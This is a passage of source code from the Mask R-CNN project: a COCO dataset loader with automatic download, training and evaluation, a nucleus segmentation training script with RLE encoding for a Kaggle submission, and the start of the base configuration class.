random_shape(self, height, width): """Generates specifications of a random shape that lies within the given height and width boundaries. Returns a tuple of three valus: * The shape name (square, circle, ...) * Shape color: a tuple of 3 values, RGB. * Shape dimensions: A tuple of values that define the shape size and location. Differs per shape type. """ # Shape shape = random.choice(["square", "circle", "triangle"]) # Color color = tuple([random.randint(0, 255) for _ in range(3)]) # Center x, y buffer = 20 y = random.randint(buffer, height - buffer - 1) x = random.randint(buffer, width - buffer - 1) # Size s = random.randint(buffer, height // 4) return shape, color, (x, y, s) def random_image(self, height, width): """Creates random specifications of an image with multiple shapes. Returns the background color of the image and a list of shape specifications that can be used to draw the image. 
""" # Pick random background color bg_color = np.array([random.randint(0, 255) for _ in range(3)]) # Generate a few random shapes and record their # bounding boxes shapes = [] boxes = [] N = random.randint(1, 4) for _ in range(N): shape, color, dims = self.random_shape(height, width) shapes.append((shape, color, dims)) x, y, s = dims boxes.append([y - s, x - s, y + s, x + s]) # Apply non-max suppression wit 0.3 threshold to avoid # shapes covering each other keep_ixs = utils.non_max_suppression( np.array(boxes), np.arange(N), 0.3) shapes = [s for i, s in enumerate(shapes) if i in keep_ixs] return bg_color, shapes File: samples/coco/coco.py """ Mask R-CNN Configurations and data loading code for MS COCO. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla ------------------------------------------------------------ Usage: import the module (see Jupyter notebooks for examples), or run from the command line as such: # Train a new model starting from pre-trained COCO weights python3 coco.py train --dataset=/path/to/coco/ --model=coco # Train a new model starting from ImageNet weights. Also auto download COCO dataset python3 coco.py train --dataset=/path/to/coco/ --model=imagenet --download=True # Continue training a model that you had trained earlier python3 coco.py train --dataset=/path/to/coco/ --model=/path/to/weights.h5 # Continue training the last model you trained python3 coco.py train --dataset=/path/to/coco/ --model=last # Run COCO evaluatoin on the last model you trained python3 coco.py evaluate --dataset=/path/to/coco/ --model=last """ import os import sys import time import numpy as np import imgaug # https://github.com/aleju/imgaug (pip3 install imgaug) # Download and install the Python COCO tools from https://github.com/waleedka/coco # That's a fork from the original https://github.com/pdollar/coco with a bug # fix for Python 3. # I submitted a pull request https://github.com/cocodataset/cocoapi/pull/50 # If the PR is merged then use the original repo. # Note: Edit PythonAPI/Makefile and replace "python" with "python3". from pycocotools.coco import COCO from pycocotools.cocoeval import COCOeval from pycocotools import mask as maskUtils import zipfile import urllib.request import shutil # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import model as modellib, utils # Path to trained weights file COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5") # Directory to save logs and model checkpoints, if not provided # through the command line argument --logs DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs") DEFAULT_DATASET_YEAR = "2014" ############################################################ # Configurations ############################################################ class CocoConfig(Config): """Configuration for training on MS COCO. Derives from the base Config class and overrides values specific to the COCO dataset. """ # Give the configuration a recognizable name NAME = "coco" # We use a GPU with 12GB memory, which can fit two images. # Adjust down if you use a smaller GPU. 
IMAGES_PER_GPU = 2 # Uncomment to train on 8 GPUs (default is 1) # GPU_COUNT = 8 # Number of classes (including background) NUM_CLASSES = 1 + 80 # COCO has 80 classes ############################################################ # Dataset ############################################################ class CocoDataset(utils.Dataset): def load_coco(self, dataset_dir, subset, year=DEFAULT_DATASET_YEAR, class_ids=None, class_map=None, return_coco=False, auto_download=False): """Load a subset of the COCO dataset. dataset_dir: The root directory of the COCO dataset. subset: What to load (train, val, minival, valminusminival) year: What dataset year to load (2014, 2017) as a string, not an integer class_ids: If provided, only loads images that have the given classes. class_map: TODO: Not implemented yet. Supports maping classes from different datasets to the same class ID. return_coco: If True, returns the COCO object. auto_download: Automatically download and unzip MS-COCO images and annotations """ if auto_download is True: self.auto_download(dataset_dir, subset, year) coco = COCO("{}/annotations/instances_{}{}.json".format(dataset_dir, subset, year)) if subset == "minival" or subset == "valminusminival": subset = "val" image_dir = "{}/{}{}".format(dataset_dir, subset, year) # Load all classes or a subset? if not class_ids: # All classes class_ids = sorted(coco.getCatIds()) # All images or a subset? if class_ids: image_ids = [] for id in class_ids: image_ids.extend(list(coco.getImgIds(catIds=[id]))) # Remove duplicates image_ids = list(set(image_ids)) else: # All images image_ids = list(coco.imgs.keys()) # Add classes for i in class_ids: self.add_class("coco", i, coco.loadCats(i)[0]["name"]) # Add images for i in image_ids: self.add_image( "coco", image_id=i, path=os.path.join(image_dir, coco.imgs[i]['file_name']), width=coco.imgs[i]["width"], height=coco.imgs[i]["height"], annotations=coco.loadAnns(coco.getAnnIds( imgIds=[i], catIds=class_ids, iscrowd=None))) if return_coco: return coco def auto_download(self, dataDir, dataType, dataYear): """Download the COCO dataset/annotations if requested. dataDir: The root directory of the COCO dataset. dataType: What to load (train, val, minival, valminusminival) dataYear: What dataset year to load (2014, 2017) as a string, not an integer Note: For 2014, use "train", "val", "minival", or "valminusminival" For 2017, only "train" and "val" annotations are available """ # Setup paths and file names if dataType == "minival" or dataType == "valminusminival": imgDir = "{}/{}{}".format(dataDir, "val", dataYear) imgZipFile = "{}/{}{}.zip".format(dataDir, "val", dataYear) imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format("val", dataYear) else: imgDir = "{}/{}{}".format(dataDir, dataType, dataYear) imgZipFile = "{}/{}{}.zip".format(dataDir, dataType, dataYear) imgURL = "http://images.cocodataset.org/zips/{}{}.zip".format(dataType, dataYear) # print("Image paths:"); print(imgDir); print(imgZipFile); print(imgURL) # Create main folder if it doesn't exist yet if not os.path.exists(dataDir): os.makedirs(dataDir) # Download images if not available locally if not os.path.exists(imgDir): os.makedirs(imgDir) print("Downloading images to " + imgZipFile + " ...") with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out: shutil.copyfileobj(resp, out) print("... done downloading.") print("Unzipping " + imgZipFile) with zipfile.ZipFile(imgZipFile, "r") as zip_ref: zip_ref.extractall(dataDir) print("... 
done unzipping") print("Will use images in " + imgDir) # Setup annotations data paths annDir = "{}/annotations".format(dataDir) if dataType == "minival": annZipFile = "{}/instances_minival2014.json.zip".format(dataDir) annFile = "{}/instances_minival2014.json".format(annDir) annURL = "https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0" unZipDir = annDir elif dataType == "valminusminival": annZipFile = "{}/instances_valminusminival2014.json.zip".format(dataDir) annFile = "{}/instances_valminusminival2014.json".format(annDir) annURL = "https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0" unZipDir = annDir else: annZipFile = "{}/annotations_trainval{}.zip".format(dataDir, dataYear) annFile = "{}/instances_{}{}.json".format(annDir, dataType, dataYear) annURL = "http://images.cocodataset.org/annotations/annotations_trainval{}.zip".format(dataYear) unZipDir = dataDir # print("Annotations paths:"); print(annDir); print(annFile); print(annZipFile); print(annURL) # Download annotations if not available locally if not os.path.exists(annDir): os.makedirs(annDir) if not os.path.exists(annFile): if not os.path.exists(annZipFile): print("Downloading zipped annotations to " + annZipFile + " ...") with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out: shutil.copyfileobj(resp, out) print("... done downloading.") print("Unzipping " + annZipFile) with zipfile.ZipFile(annZipFile, "r") as zip_ref: zip_ref.extractall(unZipDir) print("... done unzipping") print("Will use annotations in " + annFile) def load_mask(self, image_id): """Load instance masks for the given image. Different datasets use different ways to store masks. This function converts the different mask format to one format in the form of a bitmap [height, width, instances]. Returns: masks: A bool array of shape [height, width, instance count] with one mask per instance. class_ids: a 1D array of class IDs of the instance masks. """ # If not a COCO image, delegate to parent class. image_info = self.image_info[image_id] if image_info["source"] != "coco": return super(CocoDataset, self).load_mask(image_id) instance_masks = [] class_ids = [] annotations = self.image_info[image_id]["annotations"] # Build mask of shape [height, width, instance_count] and list # of class IDs that correspond to each channel of the mask. for annotation in annotations: class_id = self.map_source_class_id( "coco.{}".format(annotation['category_id'])) if class_id: m = self.annToMask(annotation, image_info["height"], image_info["width"]) # Some objects are so small that they're less than 1 pixel area # and end up rounded out. Skip those objects. if m.max() < 1: continue # Is it a crowd? If so, use a negative class ID. if annotation['iscrowd']: # Use negative class ID for crowds class_id *= -1 # For crowd masks, annToMask() sometimes returns a mask # smaller than the given dimensions. If so, resize it. 
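                    # (Note: rather than resizing, the code below replaces the
                    # undersized crowd mask with a full-image mask of ones.)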
if m.shape[0] != image_info["height"] or m.shape[1] != image_info["width"]: m = np.ones([image_info["height"], image_info["width"]], dtype=bool) instance_masks.append(m) class_ids.append(class_id) # Pack instance masks into an array if class_ids: mask = np.stack(instance_masks, axis=2).astype(np.bool) class_ids = np.array(class_ids, dtype=np.int32) return mask, class_ids else: # Call super class to return an empty mask return super(CocoDataset, self).load_mask(image_id) def image_reference(self, image_id): """Return a link to the image in the COCO Website.""" info = self.image_info[image_id] if info["source"] == "coco": return "http://cocodataset.org/#explore?id={}".format(info["id"]) else: super(CocoDataset, self).image_reference(image_id) # The following two functions are from pycocotools with a few changes. def annToRLE(self, ann, height, width): """ Convert annotation which can be polygons, uncompressed RLE to RLE. :return: binary mask (numpy 2D array) """ segm = ann['segmentation'] if isinstance(segm, list): # polygon -- a single object might consist of multiple parts # we merge all parts into one mask rle code rles = maskUtils.frPyObjects(segm, height, width) rle = maskUtils.merge(rles) elif isinstance(segm['counts'], list): # uncompressed RLE rle = maskUtils.frPyObjects(segm, height, width) else: # rle rle = ann['segmentation'] return rle def annToMask(self, ann, height, width): """ Convert annotation which can be polygons, uncompressed RLE, or RLE to binary mask. :return: binary mask (numpy 2D array) """ rle = self.annToRLE(ann, height, width) m = maskUtils.decode(rle) return m ############################################################ # COCO Evaluation ############################################################ def build_coco_results(dataset, image_ids, rois, class_ids, scores, masks): """Arrange resutls to match COCO specs in http://cocodataset.org/#format """ # If no results, return an empty list if rois is None: return [] results = [] for image_id in image_ids: # Loop through detections for i in range(rois.shape[0]): class_id = class_ids[i] score = scores[i] bbox = np.around(rois[i], 1) mask = masks[:, :, i] result = { "image_id": image_id, "category_id": dataset.get_source_class_id(class_id, "coco"), "bbox": [bbox[1], bbox[0], bbox[3] - bbox[1], bbox[2] - bbox[0]], "score": score, "segmentation": maskUtils.encode(np.asfortranarray(mask)) } results.append(result) return results def evaluate_coco(model, dataset, coco, eval_type="bbox", limit=0, image_ids=None): """Runs official COCO evaluation. dataset: A Dataset object with valiadtion data eval_type: "bbox" or "segm" for bounding box or segmentation evaluation limit: if not 0, it's the number of images to use for evaluation """ # Pick COCO images from the dataset image_ids = image_ids or dataset.image_ids # Limit to a subset if limit: image_ids = image_ids[:limit] # Get corresponding COCO image IDs. coco_image_ids = [dataset.image_info[id]["id"] for id in image_ids] t_prediction = 0 t_start = time.time() results = [] for i, image_id in enumerate(image_ids): # Load image image = dataset.load_image(image_id) # Run detection t = time.time() r = model.detect([image], verbose=0)[0] t_prediction += (time.time() - t) # Convert results to COCO format # Cast masks to uint8 because COCO tools errors out on bool image_results = build_coco_results(dataset, coco_image_ids[i:i + 1], r["rois"], r["class_ids"], r["scores"], r["masks"].astype(np.uint8)) results.extend(image_results) # Load results. 
This modifies results with additional attributes. coco_results = coco.loadRes(results) # Evaluate cocoEval = COCOeval(coco, coco_results, eval_type) cocoEval.params.imgIds = coco_image_ids cocoEval.evaluate() cocoEval.accumulate() cocoEval.summarize() print("Prediction time: {}. Average {}/image".format( t_prediction, t_prediction / len(image_ids))) print("Total time: ", time.time() - t_start) ############################################################ # Training ############################################################ if __name__ == '__main__': import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Train Mask R-CNN on MS COCO.') parser.add_argument("command", metavar="<command>", help="'train' or 'evaluate' on MS COCO") parser.add_argument('--dataset', required=True, metavar="/path/to/coco/", help='Directory of the MS-COCO dataset') parser.add_argument('--year', required=False, default=DEFAULT_DATASET_YEAR, metavar="<year>", help='Year of the MS-COCO dataset (2014 or 2017) (default=2014)') parser.add_argument('--model', required=True, metavar="/path/to/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--limit', required=False, default=500, metavar="<image count>", help='Images to use for evaluation (default=500)') parser.add_argument('--download', required=False, default=False, metavar="<True|False>", help='Automatically download and unzip MS-COCO files (default=False)', type=bool) args = parser.parse_args() print("Command: ", args.command) print("Model: ", args.model) print("Dataset: ", args.dataset) print("Year: ", args.year) print("Logs: ", args.logs) print("Auto Download: ", args.download) # Configurations if args.command == "train": config = CocoConfig() else: class InferenceConfig(CocoConfig): # Set batch size to 1 since we'll be running inference on # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 DETECTION_MIN_CONFIDENCE = 0 config = InferenceConfig() config.display() # Create model if args.command == "train": model = modellib.MaskRCNN(mode="training", config=config, model_dir=args.logs) else: model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) # Select weights file to load if args.model.lower() == "coco": model_path = COCO_MODEL_PATH elif args.model.lower() == "last": # Find last trained weights model_path = model.find_last() elif args.model.lower() == "imagenet": # Start from ImageNet trained weights model_path = model.get_imagenet_weights() else: model_path = args.model # Load weights print("Loading weights ", model_path) model.load_weights(model_path, by_name=True) # Train or evaluate if args.command == "train": # Training dataset. Use the training set and 35K from the # validation set, as as in the Mask RCNN paper. 
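        # The extra validation images come from the "valminusminival"
        # subset loaded below (2014 release only).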
dataset_train = CocoDataset() dataset_train.load_coco(args.dataset, "train", year=args.year, auto_download=args.download) if args.year in '2014': dataset_train.load_coco(args.dataset, "valminusminival", year=args.year, auto_download=args.download) dataset_train.prepare() # Validation dataset dataset_val = CocoDataset() val_type = "val" if args.year in '2017' else "minival" dataset_val.load_coco(args.dataset, val_type, year=args.year, auto_download=args.download) dataset_val.prepare() # Image Augmentation # Right/Left flip 50% of the time augmentation = imgaug.augmenters.Fliplr(0.5) # *** This training schedule is an example. Update to your needs *** # Training - Stage 1 print("Training network heads") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=40, layers='heads', augmentation=augmentation) # Training - Stage 2 # Finetune layers from ResNet stage 4 and up print("Fine tune Resnet stage 4 and up") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=120, layers='4+', augmentation=augmentation) # Training - Stage 3 # Fine tune all layers print("Fine tune all layers") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE / 10, epochs=160, layers='all', augmentation=augmentation) elif args.command == "evaluate": # Validation dataset dataset_val = CocoDataset() val_type = "val" if args.year in '2017' else "minival" coco = dataset_val.load_coco(args.dataset, val_type, year=args.year, return_coco=True, auto_download=args.download) dataset_val.prepare() print("Running COCO evaluation on {} images.".format(args.limit)) evaluate_coco(model, dataset_val, coco, "bbox", limit=int(args.limit)) else: print("'{}' is not recognized. " "Use 'train' or 'evaluate'".format(args.command)) File: samples/nucleus/nucleus.py """ Mask R-CNN Train on the nuclei segmentation dataset from the Kaggle 2018 Data Science Bowl https://www.kaggle.com/c/data-science-bowl-2018/ Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla ------------------------------------------------------------ Usage: import the module (see Jupyter notebooks for examples), or run from the command line as such: # Train a new model starting from ImageNet weights python3 nucleus.py train --dataset=/path/to/dataset --subset=train --weights=imagenet # Train a new model starting from specific weights file python3 nucleus.py train --dataset=/path/to/dataset --subset=train --weights=/path/to/weights.h5 # Resume training a model that you had trained earlier python3 nucleus.py train --dataset=/path/to/dataset --subset=train --weights=last # Generate submission file python3 nucleus.py detect --dataset=/path/to/dataset --subset=train --weights=<last or /path/to/weights.h5> """ # Set matplotlib backend # This has to be done before other importa that might # set it, but only if we're running in script mode # rather than being imported. 
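# (The Agg backend renders to files only, which lets detect() below save
# result figures with plt.savefig() on machines without a display.)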
if __name__ == '__main__': import matplotlib # Agg backend runs without a display matplotlib.use('Agg') import matplotlib.pyplot as plt import os import sys import json import datetime import numpy as np import skimage.io from imgaug import augmenters as iaa # Root directory of the project ROOT_DIR = os.path.abspath("../../") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import utils from mrcnn import model as modellib from mrcnn import visualize # Path to trained weights file COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5") # Directory to save logs and model checkpoints, if not provided # through the command line argument --logs DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs") # Results directory # Save submission files here RESULTS_DIR = os.path.join(ROOT_DIR, "results/nucleus/") # The dataset doesn't have a standard train/val split, so I picked # a variety of images to surve as a validation set. VAL_IMAGE_IDS = [ "0c2550a23b8a0f29a7575de8c61690d3c31bc897dd5ba66caec201d201a278c2", "92f31f591929a30e4309ab75185c96ff4314ce0a7ead2ed2c2171897ad1da0c7", "1e488c42eb1a54a3e8412b1f12cde530f950f238d71078f2ede6a85a02168e1f", "c901794d1a421d52e5734500c0a2a8ca84651fb93b19cec2f411855e70cae339", "8e507d58f4c27cd2a82bee79fe27b069befd62a46fdaed20970a95a2ba819c7b", "60cb718759bff13f81c4055a7679e81326f78b6a193a2d856546097c949b20ff", "da5f98f2b8a64eee735a398de48ed42cd31bf17a6063db46a9e0783ac13cd844", "9ebcfaf2322932d464f15b5662cae4d669b2d785b8299556d73fffcae8365d32", "1b44d22643830cd4f23c9deadb0bd499fb392fb2cd9526d81547d93077d983df", "97126a9791f0c1176e4563ad679a301dac27c59011f579e808bbd6e9f4cd1034", "e81c758e1ca177b0942ecad62cf8d321ffc315376135bcbed3df932a6e5b40c0", "f29fd9c52e04403cd2c7d43b6fe2479292e53b2f61969d25256d2d2aca7c6a81", "0ea221716cf13710214dcd331a61cea48308c3940df1d28cfc7fd817c83714e1", "3ab9cab6212fabd723a2c5a1949c2ded19980398b56e6080978e796f45cbbc90", "ebc18868864ad075548cc1784f4f9a237bb98335f9645ee727dac8332a3e3716", "bb61fc17daf8bdd4e16fdcf50137a8d7762bec486ede9249d92e511fcb693676", "e1bcb583985325d0ef5f3ef52957d0371c96d4af767b13e48102bca9d5351a9b", "947c0d94c8213ac7aaa41c4efc95d854246550298259cf1bb489654d0e969050", "cbca32daaae36a872a11da4eaff65d1068ff3f154eedc9d3fc0c214a4e5d32bd", "f4c4db3df4ff0de90f44b027fc2e28c16bf7e5c75ea75b0a9762bbb7ac86e7a3", "4193474b2f1c72f735b13633b219d9cabdd43c21d9c2bb4dfc4809f104ba4c06", "f73e37957c74f554be132986f38b6f1d75339f636dfe2b681a0cf3f88d2733af", "a4c44fc5f5bf213e2be6091ccaed49d8bf039d78f6fbd9c4d7b7428cfcb2eda4", "cab4875269f44a701c5e58190a1d2f6fcb577ea79d842522dcab20ccb39b7ad2", "8ecdb93582b2d5270457b36651b62776256ade3aaa2d7432ae65c14f07432d49", ] ############################################################ # Configurations ############################################################ class NucleusConfig(Config): """Configuration for training on the nucleus segmentation dataset.""" # Give the configuration a recognizable name NAME = "nucleus" # Adjust depending on your GPU memory IMAGES_PER_GPU = 6 # Number of classes (including background) NUM_CLASSES = 1 + 1 # Background + nucleus # Number of training and validation steps per epoch STEPS_PER_EPOCH = (657 - len(VAL_IMAGE_IDS)) // IMAGES_PER_GPU VALIDATION_STEPS = max(1, len(VAL_IMAGE_IDS) // IMAGES_PER_GPU) # Don't exclude based on confidence. 
Since we have two classes # then 0.5 is the minimum anyway as it picks between nucleus and BG DETECTION_MIN_CONFIDENCE = 0 # Backbone network architecture # Supported values are: resnet50, resnet101 BACKBONE = "resnet50" # Input image resizing # Random crops of size 512x512 IMAGE_RESIZE_MODE = "crop" IMAGE_MIN_DIM = 512 IMAGE_MAX_DIM = 512 IMAGE_MIN_SCALE = 2.0 # Length of square anchor side in pixels RPN_ANCHOR_SCALES = (8, 16, 32, 64, 128) # ROIs kept after non-maximum supression (training and inference) POST_NMS_ROIS_TRAINING = 1000 POST_NMS_ROIS_INFERENCE = 2000 # Non-max suppression threshold to filter RPN proposals. # You can increase this during training to generate more propsals. RPN_NMS_THRESHOLD = 0.9 # How many anchors per image to use for RPN training RPN_TRAIN_ANCHORS_PER_IMAGE = 64 # Image mean (RGB) MEAN_PIXEL = np.array([43.53, 39.56, 48.22]) # If enabled, resizes instance masks to a smaller size to reduce # memory load. Recommended when using high-resolution images. USE_MINI_MASK = True MINI_MASK_SHAPE = (56, 56) # (height, width) of the mini-mask # Number of ROIs per image to feed to classifier/mask heads # The Mask RCNN paper uses 512 but often the RPN doesn't generate # enough positive proposals to fill this and keep a positive:negative # ratio of 1:3. You can increase the number of proposals by adjusting # the RPN NMS threshold. TRAIN_ROIS_PER_IMAGE = 128 # Maximum number of ground truth instances to use in one image MAX_GT_INSTANCES = 200 # Max number of final detections per image DETECTION_MAX_INSTANCES = 400 class NucleusInferenceConfig(NucleusConfig): # Set batch size to 1 to run one image at a time GPU_COUNT = 1 IMAGES_PER_GPU = 1 # Don't resize imager for inferencing IMAGE_RESIZE_MODE = "pad64" # Non-max suppression threshold to filter RPN proposals. # You can increase this during training to generate more propsals. RPN_NMS_THRESHOLD = 0.7 ############################################################ # Dataset ############################################################ class NucleusDataset(utils.Dataset): def load_nucleus(self, dataset_dir, subset): """Load a subset of the nuclei dataset. dataset_dir: Root directory of the dataset subset: Subset to load. Either the name of the sub-directory, such as stage1_train, stage1_test, ...etc. or, one of: * train: stage1_train excluding validation images * val: validation images from VAL_IMAGE_IDS """ # Add classes. We have one class. # Naming the dataset nucleus, and the class nucleus self.add_class("nucleus", 1, "nucleus") # Which subset? # "val": use hard-coded list above # "train": use data from stage1_train minus the hard-coded list above # else: use the data from the specified sub-directory assert subset in ["train", "val", "stage1_train", "stage1_test", "stage2_test"] subset_dir = "stage1_train" if subset in ["train", "val"] else subset dataset_dir = os.path.join(dataset_dir, subset_dir) if subset == "val": image_ids = VAL_IMAGE_IDS else: # Get image ids from directory names image_ids = next(os.walk(dataset_dir))[1] if subset == "train": image_ids = list(set(image_ids) - set(VAL_IMAGE_IDS)) # Add images for image_id in image_ids: self.add_image( "nucleus", image_id=image_id, path=os.path.join(dataset_dir, image_id, "images/{}.png".format(image_id))) def load_mask(self, image_id): """Generate instance masks for an image. Returns: masks: A bool array of shape [height, width, instance count] with one mask per instance. class_ids: a 1D array of class IDs of the instance masks. 
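        Masks are read from the per-image "masks/" sub-directory, one
        binary .png file per instance.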
""" info = self.image_info[image_id] # Get mask directory from image path mask_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])), "masks") # Read mask files from .png image mask = [] for f in next(os.walk(mask_dir))[2]: if f.endswith(".png"): m = skimage.io.imread(os.path.join(mask_dir, f)).astype(np.bool) mask.append(m) mask = np.stack(mask, axis=-1) # Return mask, and array of class IDs of each instance. Since we have # one class ID, we return an array of ones return mask, np.ones([mask.shape[-1]], dtype=np.int32) def image_reference(self, image_id): """Return the path of the image.""" info = self.image_info[image_id] if info["source"] == "nucleus": return info["id"] else: super(self.__class__, self).image_reference(image_id) ############################################################ # Training ############################################################ def train(model, dataset_dir, subset): """Train the model.""" # Training dataset. dataset_train = NucleusDataset() dataset_train.load_nucleus(dataset_dir, subset) dataset_train.prepare() # Validation dataset dataset_val = NucleusDataset() dataset_val.load_nucleus(dataset_dir, "val") dataset_val.prepare() # Image augmentation # http://imgaug.readthedocs.io/en/latest/source/augmenters.html augmentation = iaa.SomeOf((0, 2), [ iaa.Fliplr(0.5), iaa.Flipud(0.5), iaa.OneOf([iaa.Affine(rotate=90), iaa.Affine(rotate=180), iaa.Affine(rotate=270)]), iaa.Multiply((0.8, 1.5)), iaa.GaussianBlur(sigma=(0.0, 5.0)) ]) # *** This training schedule is an example. Update to your needs *** # If starting from imagenet, train heads only for a bit # since they have random weights print("Train network heads") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=20, augmentation=augmentation, layers='heads') print("Train all layers") model.train(dataset_train, dataset_val, learning_rate=config.LEARNING_RATE, epochs=40, augmentation=augmentation, layers='all') ############################################################ # RLE Encoding ############################################################ def rle_encode(mask): """Encodes a mask in Run Length Encoding (RLE). Returns a string of space-separated values. """ assert mask.ndim == 2, "Mask must be of shape [Height, Width]" # Flatten it column wise m = mask.T.flatten() # Compute gradient. Equals 1 or -1 at transition points g = np.diff(np.concatenate([[0], m, [0]]), n=1) # 1-based indicies of transition points (where gradient != 0) rle = np.where(g != 0)[0].reshape([-1, 2]) + 1 # Convert second index in each pair to lenth rle[:, 1] = rle[:, 1] - rle[:, 0] return " ".join(map(str, rle.flatten())) def rle_decode(rle, shape): """Decodes an RLE encoded list of space separated numbers and returns a binary mask.""" rle = list(map(int, rle.split())) rle = np.array(rle, dtype=np.int32).reshape([-1, 2]) rle[:, 1] += rle[:, 0] rle -= 1 mask = np.zeros([shape[0] * shape[1]], np.bool) for s, e in rle: assert 0 <= s < mask.shape[0] assert 1 <= e <= mask.shape[0], "shape: {} s {} e {}".format(shape, s, e) mask[s:e] = 1 # Reshape and transpose mask = mask.reshape([shape[1], shape[0]]).T return mask def mask_to_rle(image_id, mask, scores): "Encodes instance masks to submission format." 
assert mask.ndim == 3, "Mask must be [H, W, count]" # If mask is empty, return line with image ID only if mask.shape[-1] == 0: return "{},".format(image_id) # Remove mask overlaps # Multiply each instance mask by its score order # then take the maximum across the last dimension order = np.argsort(scores)[::-1] + 1 # 1-based descending mask = np.max(mask * np.reshape(order, [1, 1, -1]), -1) # Loop over instance masks lines = [] for o in order: m = np.where(mask == o, 1, 0) # Skip if empty if m.sum() == 0.0: continue rle = rle_encode(m) lines.append("{}, {}".format(image_id, rle)) return "\n".join(lines) ############################################################ # Detection ############################################################ def detect(model, dataset_dir, subset): """Run detection on images in the given directory.""" print("Running on {}".format(dataset_dir)) # Create directory if not os.path.exists(RESULTS_DIR): os.makedirs(RESULTS_DIR) submit_dir = "submit_{:%Y%m%dT%H%M%S}".format(datetime.datetime.now()) submit_dir = os.path.join(RESULTS_DIR, submit_dir) os.makedirs(submit_dir) # Read dataset dataset = NucleusDataset() dataset.load_nucleus(dataset_dir, subset) dataset.prepare() # Load over images submission = [] for image_id in dataset.image_ids: # Load image and run detection image = dataset.load_image(image_id) # Detect objects r = model.detect([image], verbose=0)[0] # Encode image to RLE. Returns a string of multiple lines source_id = dataset.image_info[image_id]["id"] rle = mask_to_rle(source_id, r["masks"], r["scores"]) submission.append(rle) # Save image with masks visualize.display_instances( image, r['rois'], r['masks'], r['class_ids'], dataset.class_names, r['scores'], show_bbox=False, show_mask=False, title="Predictions") plt.savefig("{}/{}.png".format(submit_dir, dataset.image_info[image_id]["id"])) # Save to csv file submission = "ImageId,EncodedPixels\n" + "\n".join(submission) file_path = os.path.join(submit_dir, "submit.csv") with open(file_path, "w") as f: f.write(submission) print("Saved to ", submit_dir) ############################################################ # Command Line ############################################################ if __name__ == '__main__': import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Mask R-CNN for nuclei counting and segmentation') parser.add_argument("command", metavar="<command>", help="'train' or 'detect'") parser.add_argument('--dataset', required=False, metavar="/path/to/dataset/", help='Root directory of the dataset') parser.add_argument('--weights', required=True, metavar="/path/to/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--subset', required=False, metavar="Dataset sub-directory", help="Subset of dataset to run prediction on") args = parser.parse_args() # Validate arguments if args.command == "train": assert args.dataset, "Argument --dataset is required for training" elif args.command == "detect": assert args.subset, "Provide --subset to run prediction on" print("Weights: ", args.weights) print("Dataset: ", args.dataset) if args.subset: print("Subset: ", args.subset) print("Logs: ", args.logs) # Configurations if args.command == "train": config = NucleusConfig() else: config = NucleusInferenceConfig() config.display() # Create model if args.command == "train": model = 
modellib.MaskRCNN(mode="training", config=config, model_dir=args.logs) else: model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) # Select weights file to load if args.weights.lower() == "coco": weights_path = COCO_WEIGHTS_PATH # Download weights file if not os.path.exists(weights_path): utils.download_trained_weights(weights_path) elif args.weights.lower() == "last": # Find last trained weights weights_path = model.find_last() elif args.weights.lower() == "imagenet": # Start from ImageNet trained weights weights_path = model.get_imagenet_weights() else: weights_path = args.weights # Load weights print("Loading weights ", weights_path) if args.weights.lower() == "coco": # Exclude the last layers because they require a matching # number of classes model.load_weights(weights_path, by_name=True, exclude=[ "mrcnn_class_logits", "mrcnn_bbox_fc", "mrcnn_bbox", "mrcnn_mask"]) else: model.load_weights(weights_path, by_name=True) # Train or evaluate if args.command == "train": train(model, args.dataset, args.subset) elif args.command == "detect": detect(model, args.dataset, args.subset) else: print("'{}' is not recognized. " "Use 'train' or 'detect'".format(args.command)) File: mrcnn/config.py """ Mask R-CNN Base Configurations class. Copyright (c) 2017 Matterport, Inc. Licensed under the MIT License (see LICENSE for details) Written by Waleed Abdulla """ import numpy as np # Base Configuration Class # Don't use this class directly. Instead, sub-class it and override # the configurations you need to change. class Config(object): """Base configuration class. For custom configurations, create a sub-class that inherits from this one and override properties that need to be changed. """ # Name the configurations. For example, 'COCO', 'Experiment 3', ...etc. # Useful if your code needs to do things differently depending on which # experiment is running. NAME = None # Override in sub-classes # NUMBER OF GPUs to use. When using only a CPU, this needs to be set to 1. GPU_COUNT = 1 # Number of images to train with on each GPU. A 12GB GPU can typically # handle 2 images of 1024x1024px. # Adjust based on your GPU memory and image sizes. Use the highest # number that your GPU can handle for best performance. IMAGES_PER_GPU = 2 # Number of training steps per epoch # This doesn't need to match the size of the training set. Tensorboard # updates are saved at the end of each epoch, so setting this to a # smaller number means getting more frequent TensorBoard updates. # Validation stats are also calculated at each epoch end and 